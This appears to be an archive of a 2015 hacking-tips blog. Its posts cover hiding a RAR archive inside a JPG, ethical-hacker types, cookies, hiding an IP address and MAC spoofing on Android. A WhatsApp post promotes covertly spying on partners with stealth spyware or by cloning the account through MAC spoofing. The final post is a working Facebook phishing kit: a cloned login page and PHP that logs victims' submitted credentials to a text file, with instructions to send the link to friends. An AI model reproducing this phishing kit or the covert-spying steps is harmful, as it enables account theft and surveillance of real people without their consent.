Realme Buds 2

make-money-468x60

Thursday, June 25, 2015

How To Hide Your Files And Folders Inside Images!!!



                                                   I have a trick for you to hide your files and folders inside .jpg files. After hiding your files inside the image, the image will behave just like a normal image. However you can extract the hidden data from it whenever you want to do it.

Here’s a step by step procedure to hide your files inside images –

1.To use this trick you must first compress your files and/or folders into a single zip or rar file. The most simplest way to do is to use winrar. You can download winrar from here. Then install it on your computer. After that simply right click on your file or folder and click on Add to your_file_name.rar in the right click context menu.
                                           
This will create a rar file with the same name as your original file in the same folder.
2.Find any jpg (or jpeg) image in which you want to hide your secret rar file. If you are unsure whether an image is jpg or not, then simply right click on the image and click on Properties to find out. Copy this image and the rar file from Step 1 in the same folder.

3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.

4.Now open command prompt. Then type following commands in it,

  •                    cd desktop



5.CD stands for change directory by typing above command you change your directory to desktop. 
After that type command given below.


  •         Copy/b imagename.jpg + filename.rar finalimage.jpg

and press enter.



6. This will create a new .jpg file in the folder which contains your rar file hidden deep inside it. 

7.Replace imagename.jpg with the name of image you want your file to behidden behind. Don't forget to add image format (Eg: .jpg, .png, .gif)


8.Replace filename with name of your file you want to hide. It must be in .rar format.In this example, the file is space4hack.jpg. 
This image will behave just like a normal image so nobody can actually guess what’s inside it. 

9.Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

it looks like this
space4hack.jpg

How to get the rar file back from the image?
          To get the rar file back from the image, simply open it again with winrar(right click on the image file that contains the hidden rar file, go to open with. Then click on choose program. In the choose program dialog box, click on winrar).


  • You’ll find your hidden file or folder (that you compressed in step 1) right inside it.
  • You can then extract this file from this image, just like you extract files from rar/zip files.


Lets ROCK...

How to Spy on Someone WhatsApp !!!


               WhatsApp is one of the most widely used instant messaging applications during the recent years. Attractive features like cross-platform support, media sharing and ease of use has made WhatsApp to be the top choice among most smart phone users. On the other hand, WhatsApp has also become a favorite application for many cheaters to exchange secret messages and maintain illicit relationships. Therefore, in order to investigate the truth about their partners or children it becomes inevitable for many individuals and parents to spy on WhatsApp messages.

Ways to Spy on WhatsApp
This article will uncover some of the possible ways through which you can spy on WhatsApp messages of your children or suspected partner. The possible ways are as described below:


Using a spy software program is the easiest way to spy on WhatsApp messages. Although there are a handful of companies marketing substandard WhatsApp spy programs on the MARKET today, there exists a few genuine products as well that are worth considering. One of my favorite software to spy on WhatsApp is MSpy which is known for its quality and top notch features.

The following are some of the exciting features of mSpy which makes it a perfect choice for monitoring WhatsApp messages:


MSpy Features: 
  • Spy on call logs, SMS and Contacts 
  • Secretly record emails, web history and bookmarks. 
  • Spy on Internet activity including social media like Facebook,WhatsApp, Twitter and Gmail. 
  • Track GPS locations in real-time. 
  • View Device and SIM card information. 
  • Record keystrokes, photos and videos. 
  • Operates in a complete stealth mode and remains undetected!. 


How it Works?

You will have to download and install the mSpy app onto the target phone on which you need to monitor WhatsApp messages. Installation and configuration takes only a few minutes. However, for this you should have the target phone in your hand at least for a few minutes.

Once the installation is complete, the monitoring process of all the above mentioned activities (WhatsApp messages, calls, SMS, Internet, GPS, camera etc.) will begin and the recorded logs are silently uploaded to your mSpy account. You can login to your online account at any time to view the logs containing WhatsApp messages and other activity details. You can download mSpy from the link below:


mspy download Here


Compatible Phones: Android, BlackBerry, Apple iPhone, Windows Mobile, iPad and Tablets.


Spoofing the MAC Address: Another Way

The other way to spy on someone’s WhatsApp messages is to spoof the MAC address of the target phone from your phone. This method is somewhat considered difficult and require a moderate amount of technical skills to perform. Let me explain.

              WhatsApp has a small vulnerability which allows you to run the same WhatsApp account on two phones provided they both have the same MAC address. For this, you will have to gain access to the target phone to record its MAC address and spoof the same on your device. This is how you can find the MAC address of the target phone:


For Android – Head over to settings > About phone > Status > Wi-Fi MAC address

For iPhone – Head over to Settings > General > About > Wi-Fi address

For Windows Phone – Head over to Settings > About > More info > MAC address

For BlackBerry – Head over to options > Device > Device and Status info > WLAN MAC

                            Once you have recorded the target phone’s MAC address, you will have to spoof the MAC address on your android phone. After this is done, install WhatsApp on your phone, configure it using the target person’s phone number and verify the WhatsApp account using the verification code received on the target phone.

If you successfully manage to execute all the above mentioned steps, you will have a replica of the target user’s WhatsApp account running on your phone. That means you will receive notifications on your phone for each and every activity of the target WhatsApp user. For spying on WhatsApp, I still recommend the usage of mSpy as this method is lot simpler than that of spoofing MAC address.


DISCLAIMER: YOU IMPLEMENT ALL THE INFORMATION PROVIDED IN THIS ARTICLE AT YOUR OWN RISK. USAGE OF SPYWARE WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS AND YOU DO IT AT YOUR OWN RISK!

Monday, June 22, 2015

What Is Ethical Hacking & Types Of Hackers | Ethical Hacking Certification

         
                         Hi guys, this is very important post for all those who want to learn ethical hacking or want ethical hacking certification.This post will cover different aspects of hacking, different type of hackers and the methodologies they follow, their mindset and their working. This post will give you a introduction about how to be a hacker and how to get proper ethical hacking training.
So let us start

What is Ethical Hacking?
           Ethical Hacking is process of finding and exploiting vulnerabilities in a system and then rectifying them to protect them from other hackers. Person performing ethical hacking is person who has ethical hacking certification and holds good knowledge about computers, networks, programming and various vulnerabilities. His work is to secure his own network and protect it from all sort of cyber attacks.
Types of Hackers based on their knowledge :
Coders :
             Coders are real hackers. They are programmers having immense knowledge about many programming languages, networking and working of programs. They are skilled programmers who can find vulnerabilities on their own and create exploits based on those vulnerabilities. They can code their own tools and exploit and can modify existing tools according to their use.
You have to learn programming from basic to advanced level to be a coder.

Admins :
                   These are the computer guys who are not sound enough in programming but holds enough information about hacking and networking. These guys have Hacking certifications and can hack any system or network with the help of tools and exploit created by codes. Majority of security consultants fall in this group. They are Certified Ethical Hackers who are trained for securing networks.

Script kiddies :
                This is the most dangerous type of hackers. These type of hackers does not actually know what they are doing. They just use the tools and partial knowledge they gain from internet to attack systems. They do it just for fun purpose and to be famous. They use the tools and exploits coded by other hackers and use them. They have minimum skills.

Types of Hackers based on their motive of hacking :

White Hat Hackers :
              White hat hackers are ethical hackers with some certifications such as CEH( Certified Ethical Hacker). They break into systems just for legal purposes. Their main motive is to find loopholes in the networks and rectifying them. These type of hackers work with famous companies in securing their systems and protecting them against other hackers.


Black Hat Hacker :
              A black hat hacker may or may not have any hacking certification but they hold good knowledge about hacking. They use their skills for destructive purposes. They break into systems and networks either for fun or to gain some money from illegal means. They gain unauthorized access and destroy/steal confidential data or basically cause problems to their target.

Gray Hat Hacker :
               A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked. Then they may offer to repair their system for a small fee.
      


  CEH or Certified Ethical Hacking is a certification exam every hacker must give in order to certify that he is a trained hacker. CEH is conducted by Ec-council. You can have the examination test by registering at their site. The CEH certification is famous all over the world. They provide training camps for this camp or you can train yourself by learning hacking from sites like This or by joining some local institutions that provide CEH courses. A person having this certification could easy get a job in IT Security sector. If your desire is to be a good hacker then this certification is a must have thing for you.


So now you know about different types of hackers and their working. I will be back with another post about how they actually hack into system. Stay tuned and keep visiting How to hack to Learn Ethical Hacking.


Learn more about hacking from Cyber Kendra

What Are Cookies And Their Importance In Security?

 
                               Cookies are tasty, sweet and I have them daily in the evening with my coffee. Well, if that’s the cookie you think we would cover today in our article then you my friend are at the wrong place.

 Today we will discuss about Internet cookies and their importance from a security view point. An internet cookie is not the complex beast that has been made out of it by media, online publications and other websites.

In its simplest form a cookie is just a text string that any server stores on the user’s local storage (hard disk) just to be retrieved later. All the information in cookies is stored in the form of name-value pairs.

Those people who use Internet Explorer to surf the internet can easily browse their cookies using the Windows Explorer. Mostly the cookies are located at

C:\Documents and Settings\User name\Local Settings

or a similar directory inside the system32 folder on the C drive. Other browsers store their cookies inside their installation directories, some of the common ones are:

Cookie storage location for Chrome -
C:\Documents and Settings\<user name>\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies

Cookie storage in Firefox is done in a text file which contains all the cookies. They are stored in this location :

C:\Documents and Settings\Windows login/user name\Application Data\Mozilla\Firefox\Profiles\profile folder

                              A cookie can store relatively less data to large amounts of data. The simplest of cookies store just a simple user id. While relatively complex cookies store a user id, separate session id, time for session initiation and a lot of other values which could include your login data and maybe other relevant information too.

Misconceptions about cookies:
                                                One common doubt about cookies is that they can use our system or work as an application but it is not true. Cookies stored on our system can’t draw information from other cookies. They are just in place to be retrieved by the web server to communicate with the current activity status of the user. Any website can retrieve only the cookies that it has created on our system.

The different types of cookies:
                    Cookies are of two different types based upon their nature.

A cookie can be either:

1. Session cookie: A session cookie remains live until the user closes their browser. A session cookie stores the current information of the user such as main user id. Apart from this a session cookie has a very limited life and expires as soon as the web browser is closed fully.

2. Persistent cookie: A persistent cookie is one which stays on the system even after closing the browser. Persistent cookies can only be deleted manually or after they reach the set expiration time which is assigned to them. Once these cookies expire then the user has to generate fresh cookies with the required levels of authentication.

3. First party cookies: These cookies are generated from the same site that we are currently on. They store relevant user data for making the surfing experience personalized and easy.

4. Third party cookies: These cookies are often generated by advertising websites (like the double click dart cookie by Google), they track user’s activity across pages in order to show them targeted ads. While this may seem like a breach of privacy, it’s still acceptable as highly sensitive data is not tracked.

Threats from cookies:
                         With the rise in malicious programs and adwares, malwares the risk from rogue cookies is much high these days.
                         Malicious cookies can track our online activities and they build a web profile of the user based upon the surfing habits and pages visited by the user. But most of the users with good antivirus and firewall programs should not worry about such malicious cookies as they will be automatically flagged before causing any damage.

What is cookie stealing?
                                 Cookies are used to store session data and sometimes important information like login data etc is accessible through cookies stored in a user’s system.

Cookie stealing is essentially exploiting a computer session (the session key) for obtaining access to web services on a user’s system or information stored on it.

Cookie stealing can be done via various methods, few of which are:

1. Cross- site scripting: This involves running code on the user’s computer by fooling it to accept it as coming from a verified source. This allows the person initiating the stealing to get a copy of the cookies on the user’s system.

2. Session key stealing: An attacker who has physical access to a system can steal session key by having access to the file system on the user’s computer or the appropriate server.

3. Using packet sniffing:  (session side jacking): Packet sniffing can be used to read the traffic between two different information systems for stealing the session cookie.

4. Session fixing: This involves manipulating the user’s session id to one that is known to us by making them click on a malicious link containing our desired session id. Then once the user logs in, we get the sensitive information.

So guys this was everything you would need to get started with cookies, cookies are fun. They are everywhere on the web and they can steal your private information when not taken care of.

So, did you learn something new? Want to ask something or have some questions then tweet to us @joshimanoharp to move this conversation forward!

Saturday, June 20, 2015

How To Hide Your IP Address?


                          How to Hide Your IP Address

Borrow a different IP address to go anywhere online and stay hidden.

There are a few ways to hide your IP address...that unique number assigned to the network connection on the computer.

Top 4 reasons why people want to hide their IP address:

  • Hide their geographical location
  • Prevent Web tracking
  • Avoid leaving a digital footprint
  • Bypass any bans or blacklisting of their IP address

The safe and secure way

Use a Trusted Proxy or VIRTUAL PRIVATE NETWORK. Sign up with these services and when you go online, you'll be showing the world a different IP address...one that's on loan from the service you're using.
Here are some VPN providers that you might consider:
VPNs can be free or you can pay for the service. They help you get on the Internet and assign you a different IP address, but there's a wide range of reliability in providers.

There are many more advantages to using a personal VPN service over a proxy (usability, security, access to blocked sites).

Here you can Check VPN COMPARISON CHART

The easy way

Free Wi-Fi
Use Free Wi-Fi Outside of Your Home. An IP address doesn't travel with you. So if you simply go to a coffee shop, bookstore OR  HOTEL lobby and tap into their Wi-Fi, you will temporarily hide your usual IP address. How so? You'll be using their network's IP address for as long as you're online.
Try it out. First, check your IP address on WhatIsMyIPAddress.com, and then visit any place with free Wi-Fi, log in to their Internet and check it again.
However, if you don't use a VPN (read below), your Internet activity is at risk of being spied on or intercepted by a bad guy without your knowing it. How likely is that? Who knows! But don't make online purchases or check your bank account while drinking your Grande Espresso.

Related Articles

Wednesday, June 17, 2015

How To Spoof MAC Address On Android Phones





                         A Media Access Control (MAC) address is a 12-character unique identifier assigned to a specific piece of hardware such as the network adapter of your WiFi device. In simple words, a MAC address can be used to uniquely identify your Android phone on the Internet or the local network


Spoofing MAC Address on Android Devices

                            Even though MAC address is embedded on the hardware device during manufacture, it can still be spoofed to input a new one of your choice. Here is a detailed instruction on how to spoof MAC address on your Android phone.
             Before you spoof the MAC address, you need to record the original/current MAC address of your device which can be done according to the instruction below: 

On the Home Screen of your phone, tap Menu button and go to Settings.
Tap About Device and go to Status. 
Now scroll down to record the 12-digit code shown under Wi-Fi Mac address. An address would read something like: 


            Example MAC address: E5:12:D8:E5:69:97


Requirements for Spoofing the MAC Address
  • Rooted Android Phone 
  • BusyBox app installed on your phone 
  • Terminal Emulator app installed on your phone 
  • A Brain 
About the requirements.

1. You need to root your device. 
In order to do that search Google with - insert your device's model number here - root.

2. You need to have busybox installed. Most custom ROMS already have it installed. But if you don't have it installed this app here does an awesome job and doesn't require an internet connection. Just select the latest version and install it Here.
https://play.google.com/store/apps/d...ybox.installer

3. You need this app Here
http://sh.st/vr37Y


Once the above requirements are satisfied, follow the instructions below to spoof your MAC address:

1. Open the Terminal Emulator app and type the commands as listed below:


  • su [HIT ENTER] 
  • busybox iplink show eth0 [HIT ENTER] 
           (This will show your current MAC address, just for your confirmation)

2. Now, type the following command


  • $ busybox ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX [HIT ENTER]
       (In the above command, replace XX:XX:XX:XX:XX:XX with your new MAC address)

3. You have now spoofed your MAC address successfully. To check for the change enter the following command again:

  • $ busybox iplink show eth0 [HIT ENTER] 

                 (Now you should see your new MAC address)


I hope you like this post. For feedback and queries, pass your comments

Tuesday, June 9, 2015

How to HACK Facebook with Phishing Page



      As we all want to hack our friend facebook account, and want to read all his personal things...
Today i'm gonna teach you how to hack a facebook account with a phishing page.

 by: JoshiManohar


                               Hacking a Facebook account always sounds very interesting to everyone, there is no doubt that facebook is a largest and most popular social network around the world but also most targeted as well. Hackers used various methods to exploit any one’s facebook account and today we will make you learn the one by using phishing webpage.

Please Note: Phishing is legally offensive. I am not responsible for any action done by you.

Phishing...

What is phishing and how is it done?

Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one.

Required Files:
 For LAZY Guys Like ME...
  • index.htm Download Here
  • post.php Download Here
steps to create a phishing page:


1. Go to the Facebook Login Page , and then right click on empty space of the page, You will see the option view source page , click on that...



2. now a new tab will open which contain a source code, Select all the source code and copy



3. Now open the notepad and paste it in a notepad. then press CTRL+F (search), and type ACTION.



4. You will have to find a text which looks like...
                    action="login.php?login_attempt=1"
5. Delete all the text written in RED color and instead of it write Post.php then it will look like...                                              
                    action="Post.php"
6. Now save it on your desktop with the name index.htm, not index.html, remember...
7. Now your phishing page is ready. it will look like a pic given below . 
index

  •   index.htm file Download Here
8. Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
  fwrite($handle, $variable);
  fwrite($handle, "=");
  fwrite($handle, $value);
  fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 
(or)
Download it from here download

Open post.php in notepad and there is a text such like that "website you want to phish" replace it with http://www.facebook.com/ now save it with the name of post.php

9. You have two files now one is index.htm and another is Post.php, Remember file extension is important.

10.  Now you have to upload these both files in a web hosting site , I prefer You to use www.000webhost.com or else www.my3gb.com.

11. I prefer u to use my3gb.com because it will be easy to use.



12. You have to make a account in my3gb.com , After the account confirmation log in your account and click on file manager



13. Now upload your files on my3gb.com ( index.htm and Post.php )...



14. Now click on index.htm and you will be redirected to facebook phishing page . it seems same as facebook log in page. It is your Phishing link. Copy That URL Address.  Type any email address and password then click on login but you know that its a fake page and you will not log in, and it redirected to original facebook page.

15. Now open your my3gb account and reload page ,then you will notice that there is a third file uploaded there named as "username.txt"



16. Now open username.txt and you can see the victim's password




Now send the link of index.htm to your friends and hack them...



Lets Rockkkkk....... oooh Hackkkkk.......